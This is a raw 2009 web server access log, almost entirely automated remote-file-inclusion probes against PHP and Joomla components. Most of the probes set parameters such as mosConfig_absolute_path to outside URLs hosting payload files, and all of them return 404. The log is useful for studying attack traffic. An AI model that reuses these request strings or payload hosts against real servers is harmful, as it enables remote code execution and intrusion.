218.249.36.194 - - [15/Jun/2009:03:46:44 -0400] "GET /logs/access_log.Q109051800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:46:44 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:47:37 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:47:37 -0400] "GET /logs/access_log.Q109051800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:48:08 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:48:08 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:48:08 -0400] "GET /logs/access_log.Q109060300%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:48:12 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:48:12 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:48:12 -0400] "GET /logs/access_log.Q109060300%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:48:25 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:48:25 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:48:25 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:48:41 -0400] "GET /logs/access_log.Q109051800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:48:41 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:48:56 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:48:57 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:49:41 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:49:41 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:49:41 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
201.12.149.149 - - [15/Jun/2009:03:49:52 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.12.149.149 - - [15/Jun/2009:03:49:52 -0400] "GET /logs/index.php?redir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.12.149.149 - - [15/Jun/2009:03:49:52 -0400] "GET /index.php?redir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:49:56 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:03:49:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [15/Jun/2009:03:49:59 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:49:59 -0400] "GET /logs/access_log.Q109060300%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:49:59 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:50:11 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
201.12.149.149 - - [15/Jun/2009:03:50:16 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?redir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:50:42 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:50:56 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:52:34 -0400] "GET //modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:52:34 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:52:34 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:53:17 -0400] "GET /logs/access_log.Q109051100%20%20//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:26 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:26 -0400] "GET /logs/access_log.Q109051800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:26 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:31 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:31 -0400] "GET /logs/access_log.Q109051800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:31 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:56 -0400] "GET /logs/access_log.Q109052400///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:03:53:57 -0400] "GET /logs/access_log.Q109052400///index.php?_SERVER[DOCUMENT_ROOT]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.169.189.169 - - [15/Jun/2009:03:54:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L10859A4C5F82E400186F04V+M37+ENG HTTP/1.1" 200 44717 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085984C5D820400364F04U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
209.59.12.99 - - [15/Jun/2009:03:54:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [15/Jun/2009:03:56:20 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:56:20 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:56:20 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:03:56:46 -0400] "GET /logs///components/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:03:56:46 -0400] "GET /logs/access_log.Q109052400///components/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:56:48 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:56:48 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:56:48 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:56:57 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:57:04 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:03:58:02 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:58:10 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:59:12 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:14 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:14 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:14 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:16 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:16 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:16 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:34 -0400] "GET /logs/access_log.Q109060400%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:38 -0400] "GET /logs/access_log.Q109060400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:39 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:39 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:39 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:59:51 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:59:53 -0400] "GET /logs/access_log.Q109060400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:03:59:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [15/Jun/2009:03:59:58 -0400] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:00:18 -0400] "GET /logs/access_log.Q109060800///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:00:21 -0400] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:04:00:33 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:04:00:33 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:04:00:33 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:04:00:49 -0400] "GET /logs/access_log.Q109060400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:01:20 -0400] "GET /logs/access_log.Q109052400///components/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:01:31 -0400] "GET /logs///components/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.107.30 - - [15/Jun/2009:04:02:54 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
212.150.107.30 - - [15/Jun/2009:04:02:54 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
212.150.107.30 - - [15/Jun/2009:04:02:55 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
212.150.107.30 - - [15/Jun/2009:04:03:07 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.246.20.221 - - [15/Jun/2009:04:03:20 -0400] "GET /logs/access_log.Q109052400%20%20///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:04:01 -0400] "GET /logs/access_log.Q109052400///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:04:04:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [15/Jun/2009:04:04:56 -0400] "GET /logs/access_log.Q109052400%20%20///components/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:05:03 -0400] "GET /logs///components/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:04:05:47 -0400] "GET /logs/access_log.Q109060500/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:04:06:15 -0400] "GET /logs/access_log.Q109052900/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:04:08:13 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:04:08:33 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
81.169.136.209 - - [15/Jun/2009:04:08:50 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.169.136.209 - - [15/Jun/2009:04:08:50 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.169.136.209 - - [15/Jun/2009:04:08:50 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:04:09:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [15/Jun/2009:04:10:07 -0400] "GET /logs/access_log.Q109060800///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.150.107.30 - - [15/Jun/2009:04:10:21 -0400] "GET /logs/access_log.Q109052500//index.php?pagina=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
212.150.107.30 - - [15/Jun/2009:04:10:21 -0400] "GET //index.php?pagina=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
212.150.107.30 - - [15/Jun/2009:04:10:21 -0400] "GET /logs//index.php?pagina=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
212.150.107.30 - - [15/Jun/2009:04:11:02 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
218.246.20.221 - - [15/Jun/2009:04:11:20 -0400] "GET /logs/access_log.Q109052400///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:04:13:54 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:04:13:54 -0400] "GET /logs/access_log.Q109060500%20%20//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:04:13:54 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.6.17.151 - - [15/Jun/2009:04:13:51 -0400] "GET /images/ACE_RCM_info.pdf HTTP/1.0" 200 897304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.70.32.2 - - [15/Jun/2009:04:14:12 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:04:14:12 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:04:14:12 -0400] "GET /logs/access_log.Q109060500%20%20//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:14:22 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:14:22 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:14:22 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 271 "-" "Mozilla/5.0"
81.176.230.136 - - [15/Jun/2009:04:14:23 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
81.176.230.136 - - [15/Jun/2009:04:14:23 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
81.176.230.136 - - [15/Jun/2009:04:14:23 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
204.3.160.214 - - [15/Jun/2009:04:14:31 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 271 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:14:31 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:14:31 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:04:14:32 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
